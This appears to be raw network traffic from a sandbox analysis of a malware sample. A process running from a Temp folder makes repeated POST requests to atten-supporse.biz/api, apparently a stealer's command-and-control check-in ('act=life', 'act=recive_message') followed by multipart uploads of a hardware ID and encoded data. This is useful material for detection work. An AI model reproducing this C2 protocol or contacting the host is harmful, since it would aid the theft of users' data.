Nov 30, 2024 04:07:18.052560091 CET	297	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 90 Via: 1.1 google Date: Sat, 30 Nov 2024 01:06:52 GMT Age: 7225 Content-Type: text/html Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.4	49963	34.107.221.82	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:07:18.196954966 CET	305	OUT	GET /success.txt?ipv4 HTTP/1.1 Host: detectportal.firefox.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Pragma: no-cache Cache-Control: no-cache
Nov 30, 2024 04:07:19.333054066 CET	216	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8 Via: 1.1 google Date: Fri, 29 Nov 2024 04:38:26 GMT Age: 80933 Content-Type: text/plain Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600 Data Raw: 73 75 63 63 65 73 73 0a Data Ascii: success

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49797	104.21.16.9	443	7620	C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-30 03:06:24 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: atten-supporse.biz
2024-11-30 03:06:24 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-11-30 03:06:25 UTC	1017	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 03:06:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q10260nl6u004qs3fo23e7p219; expires=Tue, 25-Mar-2025 20:53:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bt%2FLtbKRLm%2FsKpBAKTaOTx21IJ5hyOhhTV0t4QZo484p1UMBpRarvZdrymTDkhZYD5BcPtcCj88voEuJfyhQ%2Fzpo6iNPLi%2FOllW9hc6zxkq%2Bb6LbCSIwCee4k0Q8UHCfyRvdiYM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ea79f131db14314-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1682&min_rtt=1682&rtt_var=841&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4234&recv_bytes=909&delivery_rate=76057&cwnd=181&unsent_bytes=0&cid=3d53adcd48fb1465&ts=878&x=0"
2024-11-30 03:06:25 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-11-30 03:06:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49803	104.21.16.9	443	7620	C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-30 03:06:27 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: atten-supporse.biz
2024-11-30 03:06:27 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-11-30 03:06:27 UTC	1013	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 03:06:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0l7rn0c7gciu9rnupttipjclq6; expires=Tue, 25-Mar-2025 20:53:06 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A3Utxsvt0%2FAmjMSqV5rnrSAXdPpKfSB4hdmiuIR9C4oorSJL5omagciNbweDlXvq0G7voUGBqREJNiQjFkT%2BWb8LycUjfV75nMXuej4TqbKE19uuZ2hzG1fjEtUsqJHhI3pKlLM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ea79f20becd41db-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1578&rtt_var=610&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=955&delivery_rate=1767554&cwnd=233&unsent_bytes=0&cid=4d78de854751dc09&ts=823&x=0"
2024-11-30 03:06:27 UTC	356	IN	Data Raw: 34 34 38 38 0d 0a 5a 68 55 42 50 6c 39 50 59 75 73 79 58 57 63 53 63 36 2f 6a 6d 64 54 45 46 45 49 32 49 70 51 39 53 73 44 51 39 33 72 36 4c 30 55 64 4e 33 63 63 5a 58 74 4f 79 55 45 34 52 53 67 48 33 5a 62 38 2b 4f 5a 31 4a 68 51 59 38 6c 77 6d 73 37 58 62 57 49 78 43 5a 31 78 7a 59 46 49 73 4b 6b 37 4a 56 79 56 46 4b 43 6a 55 77 66 79 36 35 69 35 67 55 30 6a 32 58 43 61 69 73 5a 77 56 69 6b 4d 6d 44 6e 6c 6d 56 6a 6f 73 42 6f 70 65 4d 41 4a 33 46 73 36 4a 39 37 32 70 66 43 38 55 44 72 5a 59 4d 4f 4c 71 31 54 65 66 57 79 51 72 64 48 4a 56 66 54 4a 4f 6b 42 41 34 43 54 42 4a 6a 59 4c 38 74 71 68 79 4a 6c 31 4b 2f 46 55 75 6f 37 53 64 43 70 4e 4a 4c 51 35 33 5a 56 63 77 4a 52 4b 48 56 44 63 4a 63 52 7a 4f 77 62 58 32 6f 57 35 67 44 41 43 6c 62 53 75 7a 6f Data Ascii: 4488ZhUBPl9PYusyXWcSc6/jmdTEFEI2IpQ9SsDQ93r6L0UdN3ccZXtOyUE4RSgH3Zb8+OZ1JhQY8lwms7XbWIxCZ1xzYFIsKk7JVyVFKCjUwfy65i5gU0j2XCaisZwVikMmDnlmVjosBopeMAJ3Fs6J972pfC8UDrZYMOLq1TefWyQrdHJVfTJOkBA4CTBJjYL8tqhyJl1K/FUuo7SdCpNJLQ53ZVcwJRKHVDcJcRzOwbX2oW5gDAClbSuzo
2024-11-30 03:06:27 UTC	1369	IN	Data Raw: 43 62 57 44 51 4f 64 51 50 47 69 50 61 37 70 6e 73 71 57 30 50 32 57 43 4b 6f 76 5a 38 63 6c 55 41 68 42 48 63 6a 45 6e 30 71 47 4d 6b 49 66 79 5a 31 41 63 71 4e 37 66 53 63 4e 6a 38 61 57 62 5a 59 4a 4f 4c 71 31 52 43 64 54 69 51 50 65 47 42 55 4e 6a 38 41 6d 31 59 79 41 47 49 58 79 49 2f 78 74 62 52 38 4c 6c 4a 44 2f 31 51 68 70 37 57 52 57 4e 59 4e 49 42 77 33 4f 78 77 63 49 41 75 46 57 69 67 46 4d 41 36 44 6d 4c 75 78 71 6a 5a 34 46 45 54 33 57 79 6d 6d 76 4a 73 63 6c 45 73 70 43 58 68 6c 56 6a 30 71 43 6f 46 59 50 67 68 37 48 73 32 45 39 72 4b 67 65 69 46 52 41 4c 67 66 4c 37 72 79 7a 56 69 32 53 69 51 57 4e 56 5a 66 4d 79 4d 48 6e 78 41 67 53 32 6c 52 79 6f 32 37 37 75 5a 34 4a 56 74 53 39 30 30 74 72 4b 43 5a 48 5a 35 41 4a 41 70 33 5a 6c 73 77 49 Data Ascii: CbWDQOdQPGiPa7pnsqW0P2WCKovZ8clUAhBHcjEn0qGMkIfyZ1AcqN7fScNj8aWbZYJOLq1RCdTiQPeGBUNj8Am1YyAGIXyI/xtbR8LlJD/1Qhp7WRWNYNIBw3OxwcIAuFWigFMA6DmLuxqjZ4FET3WymmvJsclEspCXhlVj0qCoFYPgh7Hs2E9rKgeiFRALgfL7ryzVi2SiQWNVZfMyMHnxAgS2lRyo277uZ4JVtS900trKCZHZ5AJAp3ZlswI
2024-11-30 03:06:27 UTC	1369	IN	Data Raw: 67 53 32 6c 52 79 6f 32 37 37 75 5a 36 4b 56 52 4c 2f 46 73 6f 70 62 2b 51 47 35 39 4f 4b 67 4e 39 62 56 73 35 49 51 6d 45 56 6a 38 43 64 42 54 66 68 50 4b 36 71 6a 5a 75 46 45 66 75 48 33 44 69 6e 5a 49 4f 6d 32 49 6b 46 58 34 6a 51 33 4d 30 51 49 35 63 66 31 30 77 46 73 69 4a 38 4c 43 75 64 6a 4a 52 54 76 31 65 49 71 53 7a 6d 42 53 65 54 53 59 45 63 57 39 63 4f 69 6f 53 6d 31 55 35 46 33 70 52 67 38 48 38 72 75 59 75 59 47 4a 51 34 55 34 2b 34 49 65 57 46 70 5a 4b 4d 55 52 6f 4c 55 56 39 4b 67 7a 4a 43 48 38 4f 63 42 33 4b 69 66 32 79 72 6e 6b 76 58 56 4c 33 55 79 61 77 74 5a 55 52 6c 6b 49 72 44 58 70 6b 55 54 59 6e 44 59 31 58 50 6b 55 2b 55 63 71 5a 75 2b 37 6d 51 44 42 5a 54 4e 68 55 4a 4b 76 79 69 6c 61 42 44 53 41 49 4e 7a 73 63 4f 53 45 49 67 31 Data Ascii: gS2lRyo277uZ6KVRL/Fsopb+QG59OKgN9bVs5IQmEVj8CdBTfhPK6qjZuFEfuH3DinZIOm2IkFX4jQ3M0QI5cf10wFsiJ8LCudjJRTv1eIqSzmBSeTSYEcW9cOioSm1U5F3pRg8H8ruYuYGJQ4U4+4IeWFpZKMURoLUV9KgzJCH8OcB3Kif2yrnkvXVL3UyawtZURlkIrDXpkUTYnDY1XPkU+UcqZu+7mQDBZTNhUJKvyilaBDSAINzscOSEIg1
2024-11-30 03:06:27 UTC	1369	IN	Data Raw: 46 63 71 46 2f 62 6e 6d 4f 47 42 54 57 4c 59 48 61 49 32 56 6f 46 71 35 64 32 63 62 4f 58 6f 63 4f 69 46 41 30 52 41 7a 42 6e 77 5a 77 6f 66 79 75 71 78 2f 4b 31 68 4c 38 6c 4d 68 70 37 53 55 48 5a 31 4d 49 77 68 39 5a 56 38 2b 49 67 2b 47 57 48 39 4c 4d 42 62 56 77 61 50 32 67 32 45 72 57 6b 61 32 51 47 61 37 38 70 49 55 32 42 56 6e 43 48 35 6c 57 6a 67 68 41 59 39 59 4f 67 31 30 45 4d 75 48 2b 4c 6d 69 63 79 46 62 52 50 70 52 49 71 4f 7a 6d 52 4f 58 52 69 4a 45 4f 53 4e 62 4a 57 31 59 79 57 45 38 45 32 63 42 77 63 48 6b 2b 4c 38 32 4a 31 67 41 72 68 38 70 73 4c 69 66 46 70 31 43 49 67 64 34 5a 46 45 37 49 51 71 41 57 44 6b 4b 65 51 50 4f 6a 66 57 78 71 48 6f 75 57 55 72 31 55 6d 6a 73 38 70 49 41 32 42 56 6e 4b 48 42 75 63 6a 59 68 42 38 6c 50 63 52 77 Data Ascii: FcqF/bnmOGBTWLYHaI2VoFq5d2cbOXocOiFA0RAzBnwZwofyuqx/K1hL8lMhp7SUHZ1MIwh9ZV8+Ig+GWH9LMBbVwaP2g2ErWka2QGa78pIU2BVnCH5lWjghAY9YOg10EMuH+LmicyFbRPpRIqOzmROXRiJEOSNbJW1YyWE8E2cBwcHk+L82J1gArh8psLifFp1CIgd4ZFE7IQqAWDkKeQPOjfWxqHouWUr1Umjs8pIA2BVnKHBucjYhB8lPcRw
2024-11-30 03:06:27 UTC	1369	IN	Data Raw: 75 50 32 2f 6a 59 57 55 31 44 6d 58 47 71 54 70 4a 59 4f 6b 30 41 72 52 47 67 74 52 58 30 71 44 4d 6b 49 66 77 4e 2f 47 4d 36 4f 2b 72 2b 71 65 79 56 64 52 66 64 5a 4c 4b 69 34 6c 52 36 65 54 43 49 4f 64 47 4a 57 4e 43 6f 49 6a 6c 4d 74 52 54 35 52 79 70 6d 37 37 75 5a 66 4a 30 5a 4f 35 68 38 33 37 4b 76 56 48 35 51 4e 66 30 52 7a 61 56 4d 35 4b 67 79 50 56 54 6b 49 63 52 37 4d 67 66 53 79 72 58 38 6d 56 55 33 7a 55 69 79 77 75 4a 34 58 6c 45 51 72 43 54 63 74 48 44 6f 31 51 4e 45 51 44 67 68 2b 48 38 71 58 75 36 6e 6f 62 32 42 54 54 4c 59 48 61 4b 4f 2b 6d 68 75 58 54 69 51 46 66 58 46 4f 4d 53 51 49 6a 46 77 30 43 33 59 44 79 34 37 79 74 61 56 2f 4a 31 78 4d 2f 46 77 76 34 76 7a 56 48 34 41 4e 66 30 52 55 64 45 77 77 62 52 2f 48 53 58 38 43 66 46 47 56 Data Ascii: uP2/jYWU1DmXGqTpJYOk0ArRGgtRX0qDMkIfwN/GM6O+r+qeyVdRfdZLKi4lR6eTCIOdGJWNCoIjlMtRT5Rypm77uZfJ0ZO5h837KvVH5QNf0RzaVM5KgyPVTkIcR7MgfSyrX8mVU3zUiywuJ4XlEQrCTctHDo1QNEQDgh+H8qXu6nob2BTTLYHaKO+mhuXTiQFfXFOMSQIjFw0C3YDy47ytaV/J1xM/Fwv4vzVH4ANf0RUdEwwbR/HSX8CfFGV
2024-11-30 03:06:27 UTC	1369	IN	Data Raw: 4e 77 4c 31 74 4a 2f 31 73 67 6f 62 4b 52 48 4a 39 49 4a 41 68 38 5a 46 38 79 4b 51 6d 48 57 54 42 46 50 6c 48 4b 6d 62 76 75 35 6c 63 37 56 30 7a 37 48 7a 66 73 71 39 55 66 6c 41 31 2f 52 48 74 74 57 54 30 6e 42 6f 31 56 4f 51 39 31 45 63 61 43 39 4c 4b 67 63 69 39 55 53 2f 39 65 4c 71 65 34 6e 68 36 56 54 69 45 43 4e 79 30 63 4f 6a 56 41 30 52 41 66 48 6e 30 64 79 73 48 6b 2b 4c 38 32 4a 31 67 41 72 68 38 6a 72 72 61 53 47 4a 56 4f 4c 77 46 7a 61 56 6b 39 4a 52 4b 42 55 44 67 58 59 68 48 45 68 50 65 31 70 6e 49 6d 58 55 62 31 57 32 6a 73 38 70 49 41 32 42 56 6e 4b 58 74 6b 64 54 6f 32 51 4a 59 65 4a 6b 56 33 48 59 33 5a 75 37 65 74 66 43 39 5a 51 2f 42 63 49 36 65 34 6c 42 2b 51 51 44 55 48 65 47 78 59 50 53 49 47 6a 31 45 77 41 33 63 59 7a 49 6e 38 39 Data Ascii: NwL1tJ/1sgobKRHJ9IJAh8ZF8yKQmHWTBFPlHKmbvu5lc7V0z7Hzfsq9UflA1/RHttWT0nBo1VOQ91EcaC9LKgci9US/9eLqe4nh6VTiECNy0cOjVA0RAfHn0dysHk+L82J1gArh8jrraSGJVOLwFzaVk9JRKBUDgXYhHEhPe1pnImXUb1W2js8pIA2BVnKXtkdTo2QJYeJkV3HY3Zu7etfC9ZQ/BcI6e4lB+QQDUHeGxYPSIGj1EwA3cYzIn89
2024-11-30 03:06:27 UTC	1369	IN	Data Raw: 7a 56 76 78 59 4f 4b 57 6c 6d 6c 6a 57 44 53 68 45 4c 31 6f 63 4e 43 6f 62 6d 45 59 79 46 58 64 52 38 73 2b 37 72 75 59 75 59 47 46 44 2b 46 45 76 74 4b 50 59 50 34 35 48 49 42 52 77 64 46 4e 39 59 30 43 50 45 47 64 57 50 6c 48 4a 6b 4c 76 75 39 69 52 37 41 52 4f 68 44 33 71 39 2f 49 78 59 6a 67 31 2f 56 6a 6b 6a 54 6e 31 31 51 4d 35 54 4c 52 64 32 45 74 75 43 76 49 69 59 55 54 70 5a 52 75 46 4f 46 70 79 31 6a 78 57 65 57 6a 5a 49 59 6d 42 53 4d 79 6f 57 79 52 35 2f 43 6a 42 4a 39 4d 47 7a 39 70 6b 34 59 45 77 41 72 68 38 64 6f 62 79 62 48 34 35 63 61 69 4e 74 62 6c 6f 71 50 45 44 48 45 44 6c 46 4b 45 47 44 77 66 2b 6e 35 69 35 77 42 68 75 6a 44 48 2f 79 34 49 70 57 67 51 30 78 52 43 38 78 45 6e 30 2f 51 4e 45 51 65 41 5a 69 41 38 75 43 37 62 58 68 53 42 Data Ascii: zVvxYOKWlmljWDShEL1ocNCobmEYyFXdR8s+7ruYuYGFD+FEvtKPYP45HIBRwdFN9Y0CPEGdWPlHJkLvu9iR7AROhD3q9/IxYjg1/VjkjTn11QM5TLRd2EtuCvIiYUTpZRuFOFpy1jxWeWjZIYmBSMyoWyR5/CjBJ9MGz9pk4YEwArh8dobybH45caiNtbloqPEDHEDlFKEGDwf+n5i5wBhujDH/y4IpWgQ0xRC8xEn0/QNEQeAZiA8uC7bXhSB
2024-11-30 03:06:27 UTC	1369	IN	Data Raw: 61 69 75 73 76 4a 49 4f 69 51 41 41 43 6e 42 69 53 69 30 36 44 38 6b 65 66 77 4d 77 53 5a 2f 50 75 37 4b 33 4e 6e 67 45 45 71 30 4b 65 2f 58 69 78 77 66 57 56 47 63 53 4e 7a 73 4f 63 32 30 53 79 51 68 2f 51 6e 4d 44 33 34 66 34 6f 4b 55 78 48 6d 70 6e 2b 46 67 70 74 4b 4b 43 46 39 64 6a 45 53 56 4a 58 55 6b 2b 49 77 36 4f 52 69 35 46 50 6c 48 43 77 61 4f 50 35 6a 35 67 61 77 36 32 52 32 6a 36 38 71 41 62 6c 6b 4d 67 45 6d 59 75 65 7a 4d 71 41 5a 39 41 4b 41 6f 2f 50 2f 75 67 75 2f 6a 6d 63 47 41 4d 45 72 67 66 4c 4c 50 79 7a 55 6a 4b 46 6e 4a 58 49 44 4d 4f 49 6d 4d 5a 79 55 5a 2f 58 53 4a 66 6a 5a 4f 37 37 75 59 78 49 30 5a 53 38 46 77 2b 6f 66 57 72 4a 72 39 44 49 41 56 68 63 31 45 78 44 41 4f 59 57 67 45 37 5a 52 4c 44 6a 2f 79 67 74 7a 5a 75 46 45 2b Data Ascii: aiusvJIOiQAACnBiSi06D8kefwMwSZ/Pu7K3NngEEq0Ke/XixwfWVGcSNzsOc20SyQh/QnMD34f4oKUxHmpn+FgptKKCF9djESVJXUk+Iw6ORi5FPlHCwaOP5j5gaw62R2j68qAblkMgEmYuezMqAZ9AKAo/P/ugu/jmcGAMErgfLLPyzUjKFnJXIDMOImMZyUZ/XSJfjZO77uYxI0ZS8Fw+ofWrJr9DIAVhc1ExDAOYWgE7ZRLDj/ygtzZuFE+
2024-11-30 03:06:27 UTC	1369	IN	Data Raw: 4c 47 44 47 39 39 7a 47 53 6c 6c 5a 45 77 2b 62 7a 47 45 56 43 6b 51 63 77 48 4b 76 38 57 62 74 48 45 77 56 77 4c 61 57 43 57 75 6a 4b 73 76 69 55 6f 33 52 6c 46 67 53 6a 35 74 54 73 6c 49 66 31 30 77 50 4e 2b 47 36 37 58 6b 57 69 64 5a 54 4c 5a 41 5a 72 76 79 67 31 6a 41 48 6d 6c 45 5a 53 4d 45 66 57 6f 44 6d 30 49 35 42 6d 59 53 69 72 2f 46 6d 37 52 78 4d 46 63 43 78 31 49 73 74 4b 65 57 43 4a 39 7a 47 53 6c 6c 5a 45 77 2b 62 79 57 7a 45 67 34 54 63 78 48 44 68 72 76 34 35 6d 35 67 44 41 44 62 54 53 2b 79 73 64 63 39 6f 67 38 57 45 6e 52 6a 55 6a 70 74 54 73 6c 63 66 31 30 77 48 4e 2b 47 36 37 58 71 63 54 70 54 41 4f 6b 52 4d 65 4b 6b 31 55 44 4c 41 32 63 57 4e 7a 73 63 65 69 4d 4e 69 46 4d 78 42 6d 49 44 79 34 4c 74 74 65 46 49 48 6e 74 4c 39 30 38 6c Data Ascii: LGDG99zGSllZEw+bzGEVCkQcwHKv8WbtHEwVwLaWCWujKsviUo3RlFgSj5tTslIf10wPN+G67XkWidZTLZAZrvyg1jAHmlEZSMEfWoDm0I5BmYSir/Fm7RxMFcCx1IstKeWCJ9zGSllZEw+byWzEg4TcxHDhrv45m5gDADbTS+ysdc9og8WEnRjUjptTslcf10wHN+G67XqcTpTAOkRMeKk1UDLA2cWNzsceiMNiFMxBmIDy4LtteFIHntL908l

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49810	104.21.16.9	443	7620	C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-30 03:06:29 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=EUAZJ970L7QFYEUN User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18157 Host: atten-supporse.biz
2024-11-30 03:06:29 UTC	15331	OUT	Data Raw: 2d 2d 45 55 41 5a 4a 39 37 30 4c 37 51 46 59 45 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 45 39 30 41 39 43 39 45 44 43 44 35 44 34 45 46 41 33 44 36 33 42 36 39 45 37 43 41 31 34 0d 0a 2d 2d 45 55 41 5a 4a 39 37 30 4c 37 51 46 59 45 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 55 41 5a 4a 39 37 30 4c 37 51 46 59 45 55 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 Data Ascii: --EUAZJ970L7QFYEUNContent-Disposition: form-data; name="hwid"95E90A9C9EDCD5D4EFA3D63B69E7CA14--EUAZJ970L7QFYEUNContent-Disposition: form-data; name="pid"2--EUAZJ970L7QFYEUNContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
2024-11-30 03:06:29 UTC	2826	OUT	Data Raw: 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 Data Ascii: f5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6
2024-11-30 03:06:30 UTC	1032	IN	HTTP/1.1 200 OK Date: Sat, 30 Nov 2024 03:06:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=d57a9qiupqbk4tj2soebo2nn5t; expires=Tue, 25-Mar-2025 20:53:09 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KVqsE%2Fyj%2FD7a5cJMVKgLIn%2F%2B4V8ti0MlJ%2Bn6BY6hO6Bvpgk6epAxxUO3gCyVvP0Lng8dxaBJRbnXUAM%2BanYbBuPtaTEqmXGUQ53kvLdfU%2F%2BPeSpQG6%2FkKtghHgeXllq1sKFqypI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ea79f2f5802de9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1600&rtt_var=619&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19119&delivery_rate=1739130&cwnd=199&unsent_bytes=0&cid=ace4495ae7aadffe&ts=1414&x=0"
2024-11-30 03:06:30 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a Data Ascii: fok 8.46.123.228
2024-11-30 03:06:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49815	104.21.16.9	443	7620	C:\Users\user\AppData\Local\Temp\1010481001\a6f0d09f38.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-30 03:06:32 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0FFEONMV6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8736 Host: atten-supporse.biz
2024-11-30 03:06:32 UTC	8736	OUT	Data Raw: 2d 2d 30 46 46 45 4f 4e 4d 56 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 35 45 39 30 41 39 43 39 45 44 43 44 35 44 34 45 46 41 33 44 36 33 42 36 39 45 37 43 41 31 34 0d 0a 2d 2d 30 46 46 45 4f 4e 4d 56 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 30 46 46 45 4f 4e 4d 56 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 30 46 46 45 4f 4e 4d 56 36 0d 0a 43 6f 6e 74 65 6e Data Ascii: --0FFEONMV6Content-Disposition: form-data; name="hwid"95E90A9C9EDCD5D4EFA3D63B69E7CA14--0FFEONMV6Content-Disposition: form-data; name="pid"2--0FFEONMV6Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--0FFEONMV6Conten
